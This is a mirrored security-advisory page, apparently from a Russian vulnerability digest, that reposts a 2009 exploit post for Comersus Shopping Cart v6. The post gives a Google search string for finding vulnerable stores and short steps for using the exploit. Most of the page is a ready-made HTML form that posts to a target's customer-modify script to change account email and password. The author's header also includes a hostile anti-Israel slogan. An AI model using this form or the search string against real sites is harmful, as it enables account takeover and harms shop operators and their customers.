Уведомление о безопасности: Comersus Shopping Cart <= v6 Remote User Pass Exploit

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
  Visuplay CMS SQL injection vulnerability
  AktifKobi Kurumsal Web Sql Injection Vulnerability (Tr)
  Vulnerabilities in WOSendNews
  New vulnerabilities in FCKeditor

From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 13 января 2009 г.
Subject: Comersus Shopping Cart <= v6 Remote User Pass Exploit

*******************************************************************************
# Title   : Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author : "ajann" from Turkey
# Contact : :(
# S.Page : http://www.comersus.com/
# $$      : Free
# Dork    : Powered by Comersus v6 Shopping Cart
# DorkEx :

http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&
btnG=Ara&meta=

KAHROLSUN ISRAEL

-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form

*******************************************************************************

<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
<table width="421" border="0">
     <tr>

   </tr>
   <tr>
     <td width="168">Name</td>
     <td width="220">
       <input type=text name=customerName value="test">
     </td>
   </tr>
   <tr>
     <td width="168">Last Name</td>
     <td width="220">
       <input type=text name=lastName value="test">
     </td>
   </tr>
   <tr>
     <td width="168">Company</td>
     <td width="220">
       <input type=text name=customerCompany value="test">
     </td>
   </tr>
   <tr>
     <td width="168">Phone</td>
     <td width="220">
      <input type=text name=phone value="123456789">
     </td>
   </tr>
   <tr>
     <td width="168"><strong>Email</strong></td>
     <td width="220">

       <input type="text" name="email" value="Please Add Mail">
       Edit
     </td>
   </tr>
   <tr>
     <td width="168"><strong>Password</strong></td>
     <td width="220">
       <input type=text name=password value="Please Add Pass">
       Edit
     </td>
   </tr>
   <tr>
     <td width="168">Address</td>
     <td width="220">
       <input type=text name=address value="test">
     </td>
   </tr>
   <tr>
     <td width="168">Zip</td>
     <td width="220">
       <input type=text name=zip value="08050">
     </td>
   </tr>
   <tr>
     <td width="168">State</td>
     <td width="220">

     <SELECT name=stateCode size=1>
     <OPTION value="">Select the state
       <option value="1">Please Type County below
     </OPTION>
     </SELECT>
     </td>
   </tr>
   <tr>
     <td width="168">Non listed state</td>
     <td width="220">
      <input type=text name=state value="">
     </td>
   </tr>
   <tr>
     <td width="168">City</td>
     <td width="220">
       <input type=text name=city value="test">
     </td>
   </tr>
   <tr>
     <td width="168">Country</td>
     <td width="220">

     <SELECT name=countryCode>
     <OPTION value="">Select the country
       <option value="AF" selected>AFGHANISTAN
     </OPTION>
     </SELECT>
     </td>
   </tr>



   <tr>
     <td width="168"> </td>
     <td width="220"> </td>
   </tr>
   <tr>
     <td colspan="2">
         <input type="submit" name="Modify" value="Modify">
     </td>
   </tr>
   </table>
  </form>

test server